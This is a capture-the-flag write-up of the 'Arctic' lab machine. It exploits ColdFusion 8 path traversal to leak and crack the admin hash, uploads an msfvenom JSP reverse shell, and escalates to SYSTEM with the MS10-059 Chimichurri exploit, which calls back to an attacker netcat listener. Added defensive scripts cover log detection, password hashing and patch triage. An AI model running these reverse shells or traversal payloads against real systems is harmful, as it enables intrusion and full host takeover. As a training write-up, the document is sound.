Discovered the box is running Adobe ColdFusion 8 on port 80.
Exploiting CVE-2010-2861 CVE-67047, we get a reverse shell.
Used MS10-059 for privilege escalation and got SYSTEM.
Tools Used:
nmap, msfvenom, windows-exploit-suggester.py
Nmap
# Nmap 7.80 scan initiated Thu Mar 5 17:34:43 2020 as: nmap -sC -sV -p- -oA nmap/Artic 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.060s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 5 17:40:13 2020 -- 1 IP address (1 host up) scanned in 330.62 seconds
Exploiting ColdFusion 8
Exploit
# Request sent to the ColdFusion web app
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
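As an added defensive example (not part of the original writeup), the following Python scans web-server access logs for the request pattern above: a query parameter on the /CFIDE/administrator path that carries a directory traversal sequence or an encoded null byte. The log lines, the combined-log format and the double-encoded variant on line 4 are constructed for the demo; only the target on line 3 reuses the URL from the writeup.

```python
"""
Added example, not from the writeup: flag ColdFusion administrator requests
whose query parameters contain '../' or a null byte after URL decoding.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format). Line 3 carries the
# request from the writeup; line 4 is a constructed double-encoded variant.
SAMPLE_LOG = """\
10.10.14.2 - - [05/Mar/2020:17:41:02 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 2311
10.10.14.2 - - [05/Mar/2020:17:41:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 2311
10.10.14.2 - - [05/Mar/2020:17:41:15 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1402
10.10.14.2 - - [05/Mar/2020:17:41:20 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%252f..%252fColdFusion8%252flib%252fpassword.properties%2500en HTTP/1.1" 200 1402
10.10.14.2 - - [05/Mar/2020:17:42:01 +0000] "GET /index.cfm?page=news HTTP/1.1" 200 512
"""

# Source IP, timestamp, method, request target and status from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r'(\.\./|\.\.\\)')
ADMIN_PREFIX = '/cfide/administrator'


def fully_decode(value, rounds=3):
    """URL-decode until the value stops changing, so %252f is caught like %2f."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target):
    """Return the reasons a request target to the admin path looks like traversal."""
    parts = urlsplit(target)
    reasons = []
    if not parts.path.lower().startswith(ADMIN_PREFIX):
        return reasons
    # parse_qsl decodes once; fully_decode handles any extra layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = fully_decode(value)
        if TRAVERSAL.search(decoded):
            reasons.append(f'traversal in {name}')
        if '\x00' in decoded:
            reasons.append(f'null byte in {name}')
    return reasons


def scan_log(text):
    """Return (line_no, source_ip, reasons) for every flagged request."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_target(m['target'])
        if reasons:
            hits.append((line_no, m['src'], reasons))
    return hits


if __name__ == '__main__':
    for line_no, src, reasons in scan_log(SAMPLE_LOG):
        print(f'line {line_no}: {src}: {", ".join(reasons)}')
```

The check is scoped to the administrator path so that ordinary application parameters containing a stray `..` do not page anyone; widen `ADMIN_PREFIX` to cover other sensitive paths on your own servers.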
Cracking the Hash
2f635f6d20e3fde0c53075a84b68fb07dcec9b03:happyday
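Why the leaked file is enough on its own, as an added example that is not from the writeup: ColdFusion 8 stores the administrator password as an unsalted SHA-1 hex digest, so checking a candidate costs one digest call and nothing else. The digest below is the one above; the candidate list is constructed for the demo, and the PBKDF2 scheme shown beside it is a generic hardened storage format for comparison, not anything ColdFusion 8 does.

```python
"""
Added example, not from the writeup: an unsalted SHA-1 digest audited against
a short constructed candidate list, beside a salted, iterated scheme that
makes the same audit cost a work factor per guess.
"""
import hashlib
import hmac
import os

STORED_HASH = "2f635f6d20e3fde0c53075a84b68fb07dcec9b03"  # digest from the writeup

# Constructed candidate list standing in for a dictionary.
CANDIDATES = ["password", "admin123", "coldfusion", "happyday", "winter2020"]


def audit_unsalted_sha1(stored_hex, candidates):
    """Return the candidate whose plain SHA-1 matches stored_hex, else None.
    ColdFusion 8 writes the digest in upper case, so compare case-insensitively."""
    target = stored_hex.lower()
    for pw in candidates:
        if hashlib.sha1(pw.encode()).hexdigest() == target:
            return pw
    return None


def hardened_hash(password, iterations=600_000):
    """PBKDF2-HMAC-SHA256 with a fresh 16-byte salt, packed into one string."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_hardened(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    weak = audit_unsalted_sha1(STORED_HASH, CANDIDATES)
    print("unsalted SHA-1 matched:", weak)
    record = hardened_hash("happyday", iterations=2000)
    print("hardened record:", record)
    print("verify:", verify_hardened("happyday", record))
```

Two properties matter for the defender: the salt means two users with the same password get different records, and the iteration count turns one cheap digest per guess into a tunable cost.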
Admin Login
We have admin access and we can see the path of the application is: C:\ColdFusion8\wwwroot\CFIDE
Getting a Shell
Generate a shell with msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=53 -f raw > shell.jsp
Uploading the shell to the target
Triggering the shell
http://10.10.10.11:8500/CFIDE/shell.jsp
# rlwrap nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49590
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>
Privilege Escalation
I don't want to use Metasploit, so I am going with MS10-059.
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
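Added example, not from the writeup or from windows-exploit-suggester itself: parse the output above into records and rank the missing bulletins for patching, with elevation-of-privilege issues that already have a public PoC first. The text is the suggester output printed above; the ranking rules and the summary fields are my own assumption.

```python
"""
Added example, not from the writeup: structured patch triage over
windows-exploit-suggester output.
"""
import re
from collections import Counter

# The suggester output from the writeup, used as sample input.
SUGGESTER_OUTPUT = """\
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
"""

# One bulletin line: source flag, bulletin id, title, KB number, severity.
LINE_RE = re.compile(
    r'^\[(?P<src>[EM])\] (?P<bulletin>MS\d{2}-\d{3}): (?P<title>.+?) '
    r'\((?P<kb>\d+)\) - (?P<severity>\w+)$'
)
SEVERITY_RANK = {"Critical": 0, "Important": 1, "Moderate": 2, "Low": 3}


def parse_suggester(text):
    """Return a dict per bulletin line; header, URL and '[*]' lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def is_eop(record):
    return "Elevation of Privilege" in record["title"]


def prioritise(records):
    """EoP first, public PoC before Metasploit-only, then severity, then id."""
    def key(r):
        return (
            0 if is_eop(r) else 1,
            0 if r["src"] == "E" else 1,
            SEVERITY_RANK.get(r["severity"], 9),
            r["bulletin"],
        )
    return sorted(records, key=key)


def summarise(records):
    """Counts a patch owner would want at the top of a report."""
    return {
        "total": len(records),
        "eop": sum(1 for r in records if is_eop(r)),
        "with_public_poc": sum(1 for r in records if r["src"] == "E"),
        "by_severity": dict(Counter(r["severity"] for r in records)),
    }


if __name__ == "__main__":
    recs = parse_suggester(SUGGESTER_OUTPUT)
    print(summarise(recs))
    for r in prioritise(recs):
        print(f'{r["bulletin"]}  KB{r["kb"]}  {r["severity"]:9}  {r["title"]}')
```

The point of the ordering is that a local EoP with a working public exploit is the gap a foothold turns into SYSTEM, so it should go out before the browser updates even though those are rated Critical.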
# c:\ColdFusion8\wwwroot\CFIDE>.\Chimichurri.exe 10.10.14.2 9001
.\Chimichurri.exe 10.10.14.2 9001
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
Get a reverse shell as SYSTEM
# rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49569
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\ColdFusion8\wwwroot\CFIDE>whoami
whoami
nt authority\system
c:\ColdFusion8\wwwroot\CFIDE>